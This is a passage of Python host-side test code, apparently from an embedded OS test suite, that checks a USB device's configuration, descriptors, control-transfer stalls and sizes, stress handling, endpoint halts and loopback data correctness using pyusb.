def _callback_control_sizes_test(self, key, value, timestamp):
self.test_usb_device(
usb_dev_serial_number=value,
test_fun=control_sizes_test,
log=print
)
def _callback_control_stress_test(self, key, value, timestamp):
self.test_usb_device(
usb_dev_serial_number=value,
test_fun=control_stress_test,
log=print
)
def _callback_device_reset_test(self, key, value, timestamp):
self.test_usb_device(
usb_dev_serial_number=value,
# Advance the coroutine to the next yield statement
# and send the usb_device to use.
test_fun=self.device_reset_test.send
)
def _callback_device_soft_reconnection_test(self, key, value, timestamp):
self.test_usb_device(
usb_dev_serial_number=value,
# Advance the coroutine to the next yield statement
# and send the usb_device to use.
test_fun=self.device_soft_reconnection_test.send
)
def _callback_device_suspend_resume_test(self, key, value, timestamp):
self.test_usb_device(
usb_dev_serial_number=value,
# Advance the coroutine to the next yield statement
# and send the usb_device to use.
test_fun=self.device_suspend_resume_test.send
)
def _callback_repeated_construction_destruction_test(self, key, value, timestamp):
self.test_usb_device(
usb_dev_serial_number=value,
# Advance the coroutine to the next yield statement
# and send the usb_device to use.
test_fun=self.repeated_construction_destruction_test.send
)
def _callback_ep_test_data_correctness(self, key, value, timestamp):
self.test_usb_device(
usb_dev_serial_number=value,
test_fun=ep_test_data_correctness,
log=print
)
def _callback_ep_test_halt(self, key, value, timestamp):
self.test_usb_device(
usb_dev_serial_number=value,
test_fun=ep_test_halt,
log=print
)
def _callback_ep_test_parallel_transfers(self, key, value, timestamp):
self.test_usb_device(
usb_dev_serial_number=value,
test_fun=ep_test_parallel_transfers,
log=print
)
def _callback_ep_test_parallel_transfers_ctrl(self, key, value, timestamp):
self.test_usb_device(
usb_dev_serial_number=value,
test_fun=ep_test_parallel_transfers_ctrl,
log=print
)
def _callback_ep_test_abort(self, key, value, timestamp):
self.test_usb_device(
usb_dev_serial_number=value,
test_fun=ep_test_abort,
log=print
)
def _callback_ep_test_data_toggle(self, key, value, timestamp):
self.test_usb_device(
usb_dev_serial_number=value,
test_fun=ep_test_data_toggle,
log=print
)
def _callback_reset_support(self, key, value, timestamp):
status = "false" if sys.platform == "darwin" else "true"
self.log("Reset supported: %s" % status)
self.send_kv("placeholder", status)
def find_device(self, serial_number):
# to make it more reliable, 20 retries in 2[s]
for _ in range(20):
dev = usb.core.find(custom_match=TestMatch(serial_number), backend=USB_BACKEND)
if dev is not None:
break
time.sleep(0.1)
return dev
def notify_success(self, value=None, msg=''):
"""Report a host side test success to the DUT."""
if msg:
self.log('TEST PASSED: {}'.format(msg))
if value is None:
value = MSG_VALUE_DUMMY
self.send_kv(MSG_KEY_TEST_CASE_PASSED, value)
def notify_failure(self, msg):
"""Report a host side test failure to the DUT."""
self.log('TEST FAILED: {}'.format(msg))
self.send_kv(MSG_KEY_TEST_CASE_FAILED, MSG_VALUE_DUMMY)
def notify_error(self, msg):
"""Terminate the test with an error msg."""
self.log('TEST ERROR: {}'.format(msg))
self.notify_complete(None)
def setup(self):
self.__result = False
self.device_reset_test = device_reset_test(log=print)
self.device_reset_test.send(None)
self.device_soft_reconnection_test = device_soft_reconnection_test(log=print)
self.device_soft_reconnection_test.send(None)
self.device_suspend_resume_test = device_suspend_resume_test(log=print)
self.device_suspend_resume_test.send(None)
self.repeated_construction_destruction_test = repeated_construction_destruction_test(log=print)
self.repeated_construction_destruction_test.send(None)
self.register_callback('control_basic_test', self._callback_control_basic_test)
self.register_callback('control_stall_test', self._callback_control_stall_test)
self.register_callback('control_sizes_test', self._callback_control_sizes_test)
self.register_callback('control_stress_test', self._callback_control_stress_test)
self.register_callback('device_reset_test', self._callback_device_reset_test)
self.register_callback('device_soft_reconnection_test', self._callback_device_soft_reconnection_test)
self.register_callback('device_suspend_resume_test', self._callback_device_suspend_resume_test)
self.register_callback('repeated_construction_destruction_test', self._callback_repeated_construction_destruction_test)
self.register_callback('ep_test_data_correctness', self._callback_ep_test_data_correctness)
self.register_callback('ep_test_halt', self._callback_ep_test_halt)
self.register_callback('ep_test_parallel_transfers', self._callback_ep_test_parallel_transfers)
self.register_callback('ep_test_parallel_transfers_ctrl', self._callback_ep_test_parallel_transfers_ctrl)
self.register_callback('ep_test_abort', self._callback_ep_test_abort)
self.register_callback('ep_test_data_toggle', self._callback_ep_test_data_toggle)
self.register_callback('reset_support', self._callback_reset_support)
def result(self):
return self.__result
def teardown(self):
pass
class TestMatch(object):
def __init__(self, serial):
self.serial = serial
def __call__(self, dev):
try:
return dev.serial_number == self.serial
except ValueError:
return False
def lineno():
"""Returns the current line number in our program."""
return inspect.currentframe().f_back.f_lineno
def raise_if_different(expected, actual, line, text=''):
"""Raise a RuntimeError if actual is different than expected."""
if expected != actual:
raise RuntimeError('[{}]:{}, {} Got {!r}, expected {!r}'.format(__file__, line, text, actual, expected))
def raise_unconditionally(line, text=''):
"""Raise a RuntimeError unconditionally."""
raise RuntimeError('[{}]:{}, {}'.format(__file__, line, text))
def control_basic_test(dev, vendor_id, product_id, log):
get_set_configuration_test(dev, log)
get_set_interface_test(dev, log)
get_status_test(dev, log)
set_clear_feature_test(dev, log)
get_descriptor_test(dev, vendor_id, product_id, log)
set_descriptor_test(dev, log)
def get_set_configuration_test(dev, log):
"""
Test device configuration/deconfiguration
Given an initialized USB (HOST <---> DUT connection established)
When device configuration is checked just after initialization
Then get_configuration returns 1 (default configuration is set)
When device is deconfigured
Then get_configuration returns 0 (no configuration is set)
When each from supported configurations is set
Then the configuration is set correctly
"""
print("<<< get_set_configuration_test >>>")
# check if dafault(1) configuration set
try:
ret = usb.control.get_configuration(dev)
raise_if_different(1, ret, lineno(), 'Invalid configuration.')
except usb.core.USBError as error:
raise_unconditionally(lineno(), 'get_configuration request failed ({}).'.format(str(error).strip()))
cfg = dev.get_active_configuration()
for intf in cfg:
usb.util.release_interface(dev, intf)
# deconfigure the device
try:
ret = dev.set_configuration(0)
except usb.core.USBError as error:
raise_unconditionally(lineno(), 'set_configuration request (deconfigure) failed ({}).'.format(str(error).strip()))
# check if deconfigured
try:
ret = usb.control.get_configuration(dev)
raise_if_different(0, ret, lineno(), 'Invalid configuration.')
print("device deconfigured - OK")
except usb.core.USBError as error:
raise_unconditionally(lineno(), 'get_configuration request failed ({}).'.format(str(error).strip()))
# for every configuration
for cfg in dev:
try:
# set configuration
ret = cfg.set()
except usb.core.USBError as error:
raise_unconditionally(lineno(), 'set_configuration request failed ({}).'.format(str(error).strip()))
# check if configured
try:
ret = usb.control.get_configuration(dev)
raise_if_different(cfg.bConfigurationValue, ret, lineno(), 'Invalid configuration.')
print("configuration {} set - OK ".format(cfg.bConfigurationValue))
except usb.core.USBError as error:
raise_unconditionally(lineno(), 'get_configuration request failed ({}).'.format(str(error).strip()))
# test control data transfer after configuration set
control_data_test(dev, [64, 256], log)
print("") # new line
def get_set_interface_test(dev, log):
"""
Test device interface setting
Given an initialized USB (HOST <---> DUT connection established)
When each altsetting from every supported configuration is set
Then the interface altsetting is set correctly
"""
print("<<< get_set_interface_test >>>")
# for every configuration
for cfg in dev:
cfg.set()
# for every interface
for intf in cfg:
intf.set_altsetting()
altsett = usb.control.get_interface(dev, intf.bInterfaceNumber)
raise_if_different(intf.bAlternateSetting, altsett, lineno(), text='Wrong alternate setting for interface {}'.format(intf.bInterfaceNumber))
print("cfg({}) inteface {}.{} set - OK".format(cfg.bConfigurationValue, intf.bInterfaceNumber, intf.bAlternateSetting))
control_data_test(dev, [64, 256], log)
release_interfaces(dev)
restore_default_configuration(dev)
# test control data transfer after default interface restoring
control_data_test(dev, [64, 256], log)
print("") # new line
def get_status_test(dev, log):
"""
Test device/interface/endpoint status
Given an initialized USB (HOST <---> DUT connection established)
When device status is checked
Then status is within allowed values (see status bits description below)
When control endpoint status is checked
Then control endpoint status is 0
When status of each interface from every supported configuration is checked
Then interface status is 0
When status of each endpoint in every allowed device interface/configuration combination is checked
Then endpoint status is 0 (not halted)
"""
print("<<< get_status_test >>>")
# check device status
ret = get_status(dev, CTRL_RECIPIENT_DEVICE)
# Status bits
# ret == 0b01 (D0)Self Powered
# ret == 0b10 (D1)Remote Wakeup
# (D2 - D15 reserved) Must be set to 0
if(ret < 0 or ret > 3):
raise_unconditionally(lineno(), "GET_STATUS on DEVICE failed")
# check endpoint 0 status
ret = get_status(dev, CTRL_RECIPIENT_ENDPOINT, 0)
# Status bits
# ret == 0b1 (D0)endpoint Halt
# (D1 - D15 reserved) Must be set to 0
# endpoint 0 can't be halted ret == 0
raise_if_different(0, ret, lineno(), "GET_STATUS on ENDPOINT 0 should return 0")
# for every configuration
for cfg in dev:
cfg.set()
raise_if_different(cfg.bConfigurationValue, usb.control.get_configuration(dev), lineno(), "Configuration {} set failed".format(cfg.bConfigurationValue))
for intf in cfg:
intf.set_altsetting()
# check interface status
ret = get_status(dev, CTRL_RECIPIENT_INTERFACE, intf.bInterfaceNumber)
# Status bits
# ret == 0b0
# (D0 - D15 reserved) Must be set to 0
if(ret != 0):
raise_unconditionally(lineno(), "GET_STATUS on INTERFACE ({},{}) failed".format(intf.bInterfaceNumber, intf.bAlternateSetting))
print("cfg({}) interface {}.{} status - OK".format(cfg.bConfigurationValue, intf.bInterfaceNumber, intf.bAlternateSetting))
# on every ENDPOINT in this altsetting
for ep in intf:
ret = usb.control.get_status(dev, ep)
# Status bits
# ret == 0b1 (D0)endpoint Halt
# (D1 - D15 reserved) Must be set to 0
if(ret >= 1):
raise_unconditionally(lineno(), "GET_STATUS on ENDPOINT {} failed - endpoint halted".format(ep.bEndpointAddress))
print("cfg({}) intf({}.{}) endpoint {} status - OK".format(cfg.bConfigurationValue, intf.bInterfaceNumber, intf.bAlternateSetting, ep.bEndpointAddress))
release_interfaces(dev)
restore_default_configuration(dev)
print("") # new line
def set_clear_feature_test(dev, log):
"""
Test set/clear feature on device/interface/endpoint
Given an initialized USB (HOST <---> DUT connection established)
When for each endpoint in every allowed interface/configuration combination the feature is set and then cleared
Then selected feature is set/cleared accordingly
"""
print("<<< set_clear_feature_test >>>")
# TODO:
# test set_feature on device (Remote wakeup feature not supported on DUT side)
# test set_feature on interface (not supported at all)
# for every configuration
for cfg in dev:
cfg.set()
raise_if_different(cfg.bConfigurationValue, usb.control.get_configuration(dev), lineno(), "Configuration {} set failed".format(cfg.bConfigurationValue))
for intf in cfg:
intf.set_altsetting()
# on every ENDPOINT
for ep in intf:
# halt endpoint
try:
usb.control.set_feature(dev, FEATURE_ENDPOINT_HALT, ep)
except usb.core.USBError as err:
raise_unconditionally(lineno(), 'set_feature request (halt) failed for endpoint {} ({}).'.format(ep.bEndpointAddress, str(err).strip()))
# check if endpoint was halted
try:
ret = usb.control.get_status(dev, ep)
except usb.core.USBError as err:
raise_unconditionally(lineno(), 'get_status request failed for endpoint {} ({}).'.format(ep.bEndpointAddress, str(err).strip()))
if(ret != 1):
raise_unconditionally(lineno(), "endpoint {} was not halted".format(ep.bEndpointAddress))
print("cfg({}) intf({}.{}) ep {} halted - OK".format(cfg.bConfigurationValue, intf.bInterfaceNumber, intf.bAlternateSetting, ep.bEndpointAddress))
# Control OUT CLEAR_FEATURE on endpoint - unhalt
try:
usb.control.clear_feature(dev, FEATURE_ENDPOINT_HALT, ep)
except usb.core.USBError as err:
raise_unconditionally(lineno(), "clear_feature request (unhalt) failed for endpoint {} ({})".format(ep.bEndpointAddress, str(err).strip()))
# check if endpoint was unhalted
ret = usb.control.get_status(dev, ep)
if(ret != 0):
raise_unconditionally(lineno(), "endpoint {} was not unhalted".format(ep.bEndpointAddress))
print("cfg({}) intf({}.{}) ep {} unhalted - OK".format(cfg.bConfigurationValue, intf.bInterfaceNumber, intf.bAlternateSetting, ep.bEndpointAddress))
release_interfaces(dev)
restore_default_configuration(dev)
print("") # new line
def get_descriptor_test(dev, vendor_id, product_id, log):
"""
Test device/configuration/interface/endpoint descriptors
Given an initialized USB (HOST <---> DUT connection established)
When device descriptor is read
Then the descriptor content is valid
When configuration descriptor is read
Then the descriptor content is valid
When interface descriptor is read
Then the error is thrown since it is not directly accessible
When endpoint descriptor is read
Then the error is thrown since it is not directly accessible
"""
print("<<< get_descriptor_test >>>")
# device descriptor
try:
ret = get_descriptor(dev, (DESC_TYPE_DEVICE << 8) | (0 << 0), 0, DEVICE_DESC_SIZE)
dev_desc = dict(zip(device_descriptor_keys, device_descriptor_parser.unpack(ret)))
raise_if_different(DEVICE_DESC_SIZE, dev_desc['bLength'], lineno(), text='Wrong device descriptor size.')
raise_if_different(vendor_id, dev_desc['idVendor'], lineno(), text='Wrong vendor ID.')
raise_if_different(product_id, dev_desc['idProduct'], lineno(), text='Wrong product ID.')
except usb.core.USBError:
raise_unconditionally(lineno(), "Requesting device descriptor failed")
# configuration descriptor
try:
ret = get_descriptor(dev, (DESC_TYPE_CONFIG << 8) | (0 << 0), 0, CONFIGURATION_DESC_SIZE)
conf_desc = dict(zip(configuration_descriptor_keys, configuration_descriptor_parser.unpack(ret)))
raise_if_different(CONFIGURATION_DESC_SIZE, conf_desc['bLength'], lineno(), text='Wrong configuration descriptor size.')
except usb.core.USBError:
raise_unconditionally(lineno(), "Requesting configuration descriptor failed")
# interface descriptor
try:
ret = get_descriptor(dev, (DESC_TYPE_INTERFACE << 8) | (0 << 0), 0, INTERFACE_DESC_SIZE)
raise_unconditionally(lineno(), "Requesting interface descriptor should fail since it is not directly accessible.")
except usb.core.USBError:
log("interface descriptor is not directly accessible - OK")
# endpoint descriptor
try:
ret = get_descriptor(dev, (DESC_TYPE_ENDPOINT << 8) | (0 << 0), 0, ENDPOINT_DESC_SIZE)
raise_unconditionally(lineno(), "Requesting endpoint descriptor should fail since it is not directly accessible.")
except usb.core.USBError:
log("endpoint descriptor is not directly accessible - OK")
print("") # new line
def set_descriptor_test(dev, log):
"""
Test descriptor setting
Given an initialized USB (HOST <---> DUT connection established)
When device descriptor is to be set
Then error is thrown since descriptor setting command is not supported by Mbed
"""
print("<<< set_descriptor_test >>>")
# SET_DESCRIPTOR is optional and not implemented in Mbed
# command should fail with no action on device side
# Control OUT SET_DESCRIPTOR
request_type = build_request_type(CTRL_OUT, CTRL_TYPE_STANDARD,
CTRL_RECIPIENT_DEVICE)
request = REQUEST_SET_DESCRIPTOR
value = (DESC_TYPE_DEVICE << 8) | (0 << 0) # Descriptor Type (H) and Descriptor Index (L)
index = 0 # 0 or Language ID for this request
data = bytearray(DEVICE_DESC_SIZE) # Descriptor data
try:
dev.ctrl_transfer(request_type, request, value, index, data)
raise_unconditionally(lineno(), "set_descriptor request should fail since it is not implemented")
except usb.core.USBError:
log("SET_DESCRIPTOR is unsupported - OK")
print("") # new line
def synch_frame_test(dev, log):
"""
Test sync frame request
Given an initialized USB (HOST <---> DUT connection established)
When ...
Then ...
"""
print("<<< synch_frame_test >>>")
# only for isochronous endpoints
request_type = build_request_type(CTRL_IN, CTRL_TYPE_STANDARD,
CTRL_RECIPIENT_ENDPOINT)
request = REQUEST_SYNCH_FRAME
value = 0 # Always 0 for this request
index = 1 # Endpoint index
length = 2 # Always 2 for this request (size of return data)
try:
ret = dev.ctrl_transfer(request_type, request, value, index, length)
ret = ret[0] | (ret[1] << 8)
log("synch frame ret: %d" % (ret))
except usb.core.USBError:
raise_unconditionally(lineno(), "SYNCH_FRAME request failed")
print("") # new line
def control_stall_test(dev, log):
"""
Test control endpoint stall on invalid request
Given an initialized USB (HOST <---> DUT connection established)
When unsupported request to control endpoint is to be sent
Then the endpoint is stalled and error is thrown
"""
print("<<< control_stall_test >>>")
# Control OUT stall
try:
request_type = build_request_type(CTRL_OUT, CTRL_TYPE_VENDOR,
CTRL_RECIPIENT_DEVICE)
request = VENDOR_TEST_UNSUPPORTED_REQUEST
value = 0 # Always 0 for this request
index = 0 # Communication interface
data = bytearray(64) # Dummy data
dev.ctrl_transfer(request_type, request, value, index, data, 5000)
raise_unconditionally(lineno(), "Invalid request not stalled")
except usb.core.USBError:
log("Invalid request stalled - OK")
# Control request with no data stage (Device-to-host)
try:
request_type = build_request_type(CTRL_IN, CTRL_TYPE_VENDOR,
CTRL_RECIPIENT_DEVICE)
request = VENDOR_TEST_UNSUPPORTED_REQUEST
value = 0 # Always 0 for this request
index = 0 # Communication interface
length = 0
dev.ctrl_transfer(request_type, request, value, index, length, 5000)
raise_unconditionally(lineno(), "Invalid request not stalled")
except usb.core.USBError:
log("Invalid request stalled - OK")
# Control request with no data stage (Host-to-device)
try:
request_type = build_request_type(CTRL_OUT, CTRL_TYPE_VENDOR,
CTRL_RECIPIENT_DEVICE)
request = VENDOR_TEST_UNSUPPORTED_REQUEST
value = 0 # Always 0 for this request
index = 0 # Communication interface
length = 0
dev.ctrl_transfer(request_type, request, value, index, length, 5000)
raise_unconditionally(lineno(), "Invalid request not stalled")
except usb.core.USBError:
log("Invalid request stalled - OK")
# Control IN stall
try:
request_type = build_request_type(CTRL_IN, CTRL_TYPE_VENDOR,
CTRL_RECIPIENT_DEVICE)
request = VENDOR_TEST_UNSUPPORTED_REQUEST
value = 0 # Always 0 for this request
index = 0 # Communication interface
length = 255
dev.ctrl_transfer(request_type, request, value, index, length, 5000)
raise_unconditionally(lineno(), "Invalid request not stalled")
except usb.core.USBError:
log("Invalid request stalled - OK")
for i in (3, 4, 5):
try:
request_type = build_request_type(CTRL_IN, CTRL_TYPE_STANDARD,
CTRL_RECIPIENT_DEVICE)
request = 0x6 # GET_DESCRIPTOR
value = (0x03 << 8) | (i << 0) # String descriptor index
index = 0 # Communication interface
length = 255
resp = dev.ctrl_transfer(request_type, request, value, index, length, 5000)
except usb.core.USBError:
raise_unconditionally(lineno(), "Requesting string failed i: " + str(i))
for i in (6, 7):
try:
request_type = build_request_type(CTRL_IN, CTRL_TYPE_STANDARD,
CTRL_RECIPIENT_DEVICE)
request = 0x6 # GET_DESCRIPTOR
value = (0x03 << 8) | (i << 0) # String descriptor index
index = 0 # Communication interface
length = 255
resp = dev.ctrl_transfer(request_type, request, value, index, length, 5000)
raise_unconditionally(lineno(), "Requesting string passed i: " + str(i))
except usb.core.USBError:
log("Requesting string %s failed - OK" % i)
print("") # new line
def control_sizes_test(dev, log):
"""
Test various data sizes in control transfer
Given an initialized USB (HOST <---> DUT connection established)
When control data in each tested size is sent
Then read data should match sent data
"""
list = [1, 2, 3, 7, 8, 9, 15, 16, 17, 31, 32, 33, 63, 64, 65, 127, 128, 129, 255, 256, 257, 511, 512, 513, 1023, 1024, 1025, 2047, 2048]
control_data_test(dev, list, log)
def control_data_test(dev, sizes_list, log):
# Test control requests of various data stage sizes (1,8,16,32,64,255,256,...)
count = 1
for i in sizes_list:
request_type = build_request_type(CTRL_OUT, CTRL_TYPE_VENDOR,
CTRL_RECIPIENT_DEVICE)
request = VENDOR_TEST_CTRL_OUT_SIZES
value = i # Size of data the device should actually read
index = 0 # Unused - set for debugging only
data = bytearray(os.urandom(i)) # Dummy data
try:
dev.ctrl_transfer(request_type, request, value, index, data, 5000)
except usb.core.USBError:
raise_unconditionally(lineno(), "VENDOR_TEST_CTRL_OUT_SIZES failed ")
request_type = build_request_type(CTRL_IN, CTRL_TYPE_VENDOR,
CTRL_RECIPIENT_DEVICE)
request = VENDOR_TEST_CTRL_IN_SIZES
value = 0 # Size of data the device should actually send
index = 0 # Unused - set for debugging only
length = i
try:
ret = dev.ctrl_transfer(request_type, request, value, index, length, 5000)
raise_if_different(i, len(ret), lineno(), "send/receive data is the wrong size")
for j in range(0, i):
raise_if_different(data[j], ret[j], lineno(), "send/receive data mismatch")
except usb.core.USBError:
raise_unconditionally(lineno(), "VENDOR_TEST_CTRL_IN_SIZES failed")
count += 1
def control_stress_test(dev, log):
"""
Test various patterns of control transfers
Given an initialized USB (HOST <---> DUT connection established)
When stress control transfer with a data in stage is performed
Then transfer ends with success
When stress control transfer with a data out stage followed by a control transfer with a data in stage is performed
Then transfer ends with success
When stress control transfer with a data out stage is performed
Then transfer ends with success
"""
# Some devices have had problems with back-to-back
# control transfers. Intentionally send these sequences
# to make sure they are properly handled.
count = 0
for _ in range(100):
# Control transfer with a data in stage
request_type = build_request_type(CTRL_IN, CTRL_TYPE_VENDOR,
CTRL_RECIPIENT_DEVICE)
request = VENDOR_TEST_CTRL_IN
value = 8 # Size of data the device should actually send
index = count # Unused - set for debugging only
length = 255
dev.ctrl_transfer(request_type, request, value, index, length, 5000)
count += 1
for _ in range(100):
# Control transfer with a data out stage followed
# by a control transfer with a data in stage
request_type = build_request_type(CTRL_OUT, CTRL_TYPE_VENDOR,
CTRL_RECIPIENT_DEVICE)
request = VENDOR_TEST_CTRL_OUT
value = 8 # Size of data the device should actually read
index = count # Unused - set for debugging only
data = bytearray(8) # Dummy data
dev.ctrl_transfer(request_type, request, value, index, data, 5000)
count += 1
request_type = build_request_type(CTRL_IN, CTRL_TYPE_VENDOR,
CTRL_RECIPIENT_DEVICE)
request = VENDOR_TEST_CTRL_IN
value = 8 # Size of data the device should actually send
index = count # Unused - set for debugging only
length = 255
dev.ctrl_transfer(request_type, request, value, index, length, 5000)
count += 1
for _ in range(100):
# Control transfer with a data out stage
request_type = build_request_type(CTRL_OUT, CTRL_TYPE_VENDOR,
CTRL_RECIPIENT_DEVICE)
request = VENDOR_TEST_CTRL_OUT
value = 8 # Size of data the device should actually read
index = count # Unused - set for debugging only
data = bytearray(8) # Dummy data
dev.ctrl_transfer(request_type, request, value, index, data, 5000)
count += 1
def find_ep_pair(intf, endpoint_type):
"""Find an OUT and IN endpoint pair.
Raise a RuntimeError if any endpoint could not be found
or wMaxPacketSize is not equal for both endpoints.
"""
ep_out = usb.util.find_descriptor(
intf, custom_match=lambda e:
usb.util.endpoint_type(e.bmAttributes) == endpoint_type and
usb.util.endpoint_direction(e.bEndpointAddress) == usb.ENDPOINT_OUT)
ep_in = usb.util.find_descriptor(
intf, custom_match=lambda e:
usb.util.endpoint_type(e.bmAttributes) == endpoint_type and
usb.util.endpoint_direction(e.bEndpointAddress) == usb.ENDPOINT_IN)
if not all((ep_out, ep_in)):
raise_unconditionally(lineno(), 'Unable to find {} endpoint pair.'
.format(ENDPOINT_TYPE_NAMES[endpoint_type]))
raise_if_different(ep_out.wMaxPacketSize, ep_in.wMaxPacketSize, lineno(),
'wMaxPacketSize not equal for OUT and IN {} endpoints.'
.format(ENDPOINT_TYPE_NAMES[endpoint_type]))
return ep_out, ep_in
def loopback_ep_test(ep_out, ep_in, payload_size):
"""Send and receive random data using OUT/IN endpoint pair.
Verify that data received from IN endpoint is equal to
data sent to OUT endpoint.
Raise a RuntimeError if data does not match.
"""
payload_out = array.array('B', (random.randint(0x00, 0xff) for _ in range(payload_size)))
ep_out.write(payload_out)
payload_in = ep_in.read(ep_in.wMaxPacketSize)
raise_if_different(payload_out, payload_in, lineno(), 'Payloads mismatch.')
def random_size_loopback_ep_test(ep_out, ep_in, failure, error, seconds, log, min_payload_size=1):
"""Repeat data transfer test for OUT/IN endpoint pair for a given time.
Set a failure Event if OUT/IN data verification fails.
Set an error Event if unexpected USB error occurs.
"""
end_ts = time.time() + seconds
while time.time() < end_ts and not failure.is_set() and not error.is_set():
payload_size = random.randint(min_payload_size, ep_out.wMaxPacketSize)
try:
loopback_ep_test(ep_out, ep_in, payload_size)
except RuntimeError as err:
log(err)
failure.set()
return
except usb.USBError as err:
log(USB_ERROR_FMT.format(err, ep_out, ep_in, payload_size))
error.set()
return
time.sleep(0.01)
def halt_ep_test(dev, ep_out, ep_in, log):
"""OUT/IN endpoint halt test.
Verify that halting an endpoint at a random point of OUT or IN transfer
raises a USBError.
Raise a RuntimeError if halt fails or any unexpected error occurs.
"""
MIN_HALT_DELAY = 0.01
MAX_HALT_DELAY = 0.1
POST_HALT_DELAY = 0.1
ctrl_error = Event()
for ep in (ep_out, ep_in):
try:
if (usb.control.get_status(dev, ep) == 1):
raise_unconditionally(lineno(), 'Endpoints must NOT be halted at the start of this test')
except usb.core.USBError as err:
raise_unconditionally(lineno(), 'Unable to get endpoint status ({!r}).'.format(err))
ep_to_halt = random.choice([ep_out, ep_in])
def timer_handler():
"""Halt an endpoint using a USB control request."""
try:
usb.control.set_feature(dev, FEATURE_ENDPOINT_HALT, ep_to_halt)
if (usb.control.get_status(dev, ep_to_halt) != 1):
raise RuntimeError('Invalid endpoint status after halt operation')
except Exception as err:
ctrl_error.set()
log('Endpoint {:#04x} halt failed ({!r}).'.format(ep_to_halt.bEndpointAddress, err))
# Whether the halt operation was successful or not,
# wait a bit so the main thread has a chance to run into a USBError
# or report the failure of halt operation.
time.sleep(POST_HALT_DELAY)
delay = random.uniform(MIN_HALT_DELAY, MAX_HALT_DELAY)
delayed_halt = Timer(delay, timer_handler)
delayed_halt.start()
# Keep transferring data to and from the device until one of the endpoints
# is halted.
try:
while delayed_halt.is_alive():
if ctrl_error.is_set():
break
try:
loopback_ep_test(ep_out, ep_in, ep_out.wMaxPacketSize)
except usb.core.USBError as err:
if ctrl_error.is_set():
break
try:
ep_status = usb.control.get_status(dev, ep_to_halt)
except usb.core.USBError as err:
if ctrl_error.is_set():
break
raise_unconditionally(lineno(), 'Unable to get endpoint status ({!r}).'.format(err))
if ep_status == 1:
# OK, got USBError because of endpoint halt
return
else:
raise_unconditionally(lineno(), 'Unexpected error ({!r}).'.format(err))
if ctrl_error.is_set():
raise_unconditionally(lineno(), 'Halting endpoint {0.bEndpointAddress:#04x} failed'
.format(ep_to_halt))
finally:
# Always wait for the Timer thread created above.
delayed_halt.join()
if not ctrl_error.is_set():
ep_out.clear_halt()
ep_in.clear_halt()
raise_unconditionally(lineno(), 'Halting endpoint {0.bEndpointAddress:#04x}'
' during transmission did not raise USBError.'
.format(ep_to_halt))
def request_endpoint_loops_restart(dev):
ctrl_kwargs = {
'bmRequestType': build_request_type(CTRL_OUT, CTRL_TYPE_VENDOR, CTRL_RECIPIENT_DEVICE),
'bRequest': VENDOR_TEST_RW_RESTART,
'wValue': 0,
'wIndex': 0}
dev.ctrl_transfer(**ctrl_kwargs)
def request_abort_buff_check(dev, ep):
ctrl_kwargs = {
'bmRequestType': build_request_type(CTRL_IN, CTRL_TYPE_VENDOR, CTRL_RECIPIENT_ENDPOINT),
'bRequest': VENDOR_TEST_ABORT_BUFF_CHECK,
'wValue': 0,
'wIndex': ep.bEndpointAddress,
'data_or_wLength': 1}
return bool(dev.ctrl_transfer(**ctrl_kwargs)[0])
USB_ERROR_FMT = str('Got {0!r} while testing endpoints '
'{1.bEndpointAddress:#04x}({1.wMaxPacketSize:02}) and '
'{2.bEndpointAddress:#04x}({2.wMaxPacketSize:02}) with '
'a random payload of {3} B.')
def ep_test_data_correctness(dev, log, verbose=False):
"""Test data correctness for every OUT/IN endpoint pair.
Given a USB device with multiple OUT/IN endpoint pairs
When the host sends random payloads up to wMaxPacketSize in size
to an OUT endpoint of the device,
and then the device sends data back to host using an IN endpoint
Then data sent and received by host is equal for every endpoint pair
"""
cfg = dev.get_active_configuration()
for intf in cfg:
log('interface {}, alt {} -- '.format(intf.bInterfaceNumber, intf.bAlternateSetting), end='')
if intf.bAlternateSetting == 0:
log('skipping the default AlternateSetting')
continue
log('running tests')
intf.set_altsetting()
bulk_out, bulk_in = find_ep_pair(intf, usb.ENDPOINT_TYPE_BULK)
interrupt_out, interrupt_in = find_ep_pair(intf, usb.ENDPOINT_TYPE_INTERRUPT)
iso_out, iso_in = find_ep_pair(intf, usb.ENDPOINT_TYPE_ISOCHRONOUS)
if verbose:
log('\tbulk_out {0.bEndpointAddress:#04x}, {0.wMaxPacketSize:02} B'.format(bulk_out))
log('\tbulk_in {0.bEndpointAddress:#04x}, {0.wMaxPacketSize:02} B'.format(bulk_in))
log('\tinterrupt_out {0.bEndpointAddress:#04x}, {0.wMaxPacketSize:02} B'.format(interrupt_out))
log('\tinterrupt_in {0.bEndpointAddress:#04x}, {0.wMaxPacketSize:02} B'.format(interrupt_in))
log('\tiso_out {0.bEndpointAddress:#04x}, {0.wMaxPacketSize:02} B'.format(iso_out))
log('\tiso_in {0.bEndpointAddress:#04x}, {0.wMaxPacketSize:02} B'.format(iso_in))
if verbose:
log('Testing OUT/IN data correctness for bulk endpoint pair.')
for payload_size in range(bulk_out.wMaxPacketSize + 1):
try:
loopback_ep_test(bulk_out, bulk_in, payload_size)
except usb.USBError as err:
raise_unconditionally(lineno(), USB_ERROR_FMT.format(err, bulk_out, bulk_in, payload_size))
if verbose:
log('Testing OUT/IN data correctness for interrupt endpoint pair.')
for payload_size in range(interrupt_out.wMaxPacketSize + 1):
try:
loopback_ep_test(interrupt_out, interrupt_in, payload_size)
except usb.USBError as err:
raise_unconditionally(lineno(), USB_ERROR_FMT.format(err, interrupt_out, interrupt_in, payload_size))
# if verbose:
# log('Testing OUT/IN data correctness for isochronous endnpoint pair.')
# payload_size = 128 # range(1, iso_out.wMaxPacketSize + 1):
# try:
# loopback_ep_test(iso_out, iso_in, payload_size)
# except usb.USBError as err:
# log(err)
# raise_unconditionally(lineno(), USB_ERROR_FMT.format(err, iso_out, iso_in, payload_size))
def ep_test_halt(dev, log, verbose=False):
"""Test endpoint halt for every OUT/IN endpoint pair.
Given a USB device with multiple OUT/IN endpoint pairs
When the host issues an endpoint halt control request at a random point
of OUT or IN transfer
Then the endpoint is stalled and all further transfers fail
"""
cfg = dev.get_active_configuration()
for intf in cfg:
log('interface {}, alt {} -- '.format(intf.bInterfaceNumber, intf.bAlternateSetting), end='')
if intf.bAlternateSetting == 0:
log('skipping the default AlternateSetting')
continue
log('running tests')
intf.set_altsetting()
bulk_out, bulk_in = find_ep_pair(intf, usb.ENDPOINT_TYPE_BULK)
interrupt_out, interrupt_in = find_ep_pair(intf, usb.ENDPOINT_TYPE_INTERRUPT)
if verbose:
log('\tbulk_out {0.bEndpointAddress:#04x}, {0.wMaxPacketSize:02} B'.format(bulk_out))
